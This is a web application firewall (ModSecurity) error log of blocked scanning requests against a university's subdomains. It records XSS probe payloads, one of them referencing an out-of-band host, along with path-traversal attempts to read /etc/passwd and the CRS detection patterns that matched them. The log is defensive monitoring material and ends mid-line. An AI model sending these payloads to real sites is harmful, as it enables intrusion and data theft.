[Tue Aug 29 11:51:31.552098 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:routineName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:routineName: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/jsps/genrequest.jsp"] [unique_id "ZO15U8Co-f0AAAkyyGMAAAAW"]
[Tue Aug 29 11:51:31.553697 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.pro\\x22><img src=x onerror=alert(document.domain)> found within TX:1: oast.pro\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cas/logout"] [unique_id "ZO15U8Co-f0AAAkr0HEAAAAC"]
[Tue Aug 29 11:51:31.556833 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onerror= found within ARGS:callback: </script><img/src/onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15U8Co-f0AAAmLPT4AAAAN"]
[Tue Aug 29 11:51:31.572781 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.pro\\x22><img src=x onerror=alert(document.domain)> found within TX:1: oast.pro\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/cas/logout"] [unique_id "ZO15U8Co-f0AAAm80QQAAAAF"]
[Tue Aug 29 11:51:31.573447 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:Display_FAQ. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:Display_FAQ: </script><svg/onload=alert(document.cookie)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15U8Co-f0AAAnIlhsAAAAV"]
[Tue Aug 29 11:51:32.587136 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:Display_FAQ. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:Display_FAQ: </script><svg/onload=alert(document.cookie)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15VMCo-f0AAAmQ-ygAAAAb"]
[Tue Aug 29 11:51:32.645748 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:Display_FAQ. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:Display_FAQ: </script><svg/onload=alert(document.cookie)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15VMCo-f0AAAnHQfQAAAAT"]
[Tue Aug 29 11:51:32.669304 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:Display_FAQ. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:Display_FAQ: </script><svg/onload=alert(document.cookie)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15VMCo-f0AAAm7m-4AAAAE"]
[Tue Aug 29 11:51:32.684575 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Display_FAQ. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:Display_FAQ: </script><svg/onload=alert(document.cookie)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15VMCo-f0AAAnHQfUAAAAT"]
[Tue Aug 29 11:51:32.701710 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Display_FAQ. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:Display_FAQ: </script><svg/onload=alert(document.cookie)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15VMCo-f0AAAm7m-8AAAAE"]
[Tue Aug 29 11:51:33.584506 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:id: \\x22><script>alert('2Ue0HEhxUkrmNh9pZggHjrmQ3SN')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/jira/secure/BrowseProject.jspa"] [unique_id "ZO15VcCo-f0AAAmQ-zAAAAAb"]
[Tue Aug 29 11:51:33.730932 2023] [:error] [pid 2521] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:id: \\x22><script>alert('2Ue0HEhxUkrmNh9pZggHjrmQ3SN')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/jira/secure/BrowseProject.jspa"] [unique_id "ZO15VcCo-f0AAAnZfDMAAAAG"]
[Tue Aug 29 11:51:34.406771 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:action: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15VsCo-f0AAAmQ-zQAAAAb"]
[Tue Aug 29 11:51:34.703728 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:id: \\x22><script>alert('2Ue0HEhxUkrmNh9pZggHjrmQ3SN')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/jira/secure/BrowseProject.jspa"] [unique_id "ZO15VsCo-f0AAAnf3kAAAAAM"]
[Tue Aug 29 11:51:34.808454 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:id: \\x22><script>alert('2Ue0HEhxUkrmNh9pZggHjrmQ3SN')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/jira/secure/BrowseProject.jspa"] [unique_id "ZO15VsCo-f0AAAmQ-zkAAAAb"]
[Tue Aug 29 11:51:34.829452 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:action: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15VsCo-f0AAAnB5WoAAAAJ"]
[Tue Aug 29 11:51:34.842684 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:id: \\x22><script>alert('2Ue0HEhxUkrmNh9pZggHjrmQ3SN')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/jira/secure/BrowseProject.jspa"] [unique_id "ZO15VsCo-f0AAAmQ-zoAAAAb"]
[Tue Aug 29 11:51:34.868679 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:action: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15VsCo-f0AAAnf3kMAAAAM"]
[Tue Aug 29 11:51:34.871740 2023] [:error] [pid 2528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:action: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15VsCo-f0AAAngCToAAAAP"]
[Tue Aug 29 11:51:34.888150 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:action: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15VsCo-f0AAAnd29wAAAAI"]
[Tue Aug 29 11:51:34.916135 2023] [:error] [pid 2528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15VsCo-f0AAAngCTwAAAAP"]
[Tue Aug 29 11:51:34.928383 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/webEdition/showTempFile.php"] [unique_id "ZO15VsCo-f0AAAnB5W4AAAAJ"]
[Tue Aug 29 11:51:34.928851 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:orderby. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:orderby: title\\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wpdmpro/list-packages/"] [unique_id "ZO15VsCo-f0AAAnd294AAAAI"]
[Tue Aug 29 11:51:34.952105 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/webEdition/showTempFile.php"] [unique_id "ZO15VsCo-f0AAAnd298AAAAI"]
[Tue Aug 29 11:51:34.972157 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15VsCo-f0AAAnepMIAAAAK"]
[Tue Aug 29 11:51:34.982686 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:action: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15VsCo-f0AAAnf3kgAAAAM"]
[Tue Aug 29 11:51:35.022120 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAnf3koAAAAM"]
[Tue Aug 29 11:51:35.039253 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAnB5XMAAAAJ"]
[Tue Aug 29 11:51:35.066469 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/webEdition/showTempFile.php"] [unique_id "ZO15V8Co-f0AAAnf3kwAAAAM"]
[Tue Aug 29 11:51:35.080315 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAnB5XUAAAAJ"]
[Tue Aug 29 11:51:35.105987 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/webEdition/showTempFile.php"] [unique_id "ZO15V8Co-f0AAAnepMgAAAAK"]
[Tue Aug 29 11:51:35.126855 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webEdition/showTempFile.php"] [unique_id "ZO15V8Co-f0AAAnepMkAAAAK"]
[Tue Aug 29 11:51:35.136510 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:id: \\x22><script>alert('2Ue0HEhxUkrmNh9pZggHjrmQ3SN')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/jira/secure/BrowseProject.jspa"] [unique_id "ZO15V8Co-f0AAAnf3k8AAAAM"]
[Tue Aug 29 11:51:35.538899 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/webEdition/showTempFile.php"] [unique_id "ZO15V8Co-f0AAAnepMoAAAAK"]
[Tue Aug 29 11:51:35.538918 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAnf3lAAAAAM"]
[Tue Aug 29 11:51:35.540933 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAm7nAEAAAAE"]
[Tue Aug 29 11:51:35.560632 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:orderby. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:orderby: title\\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag 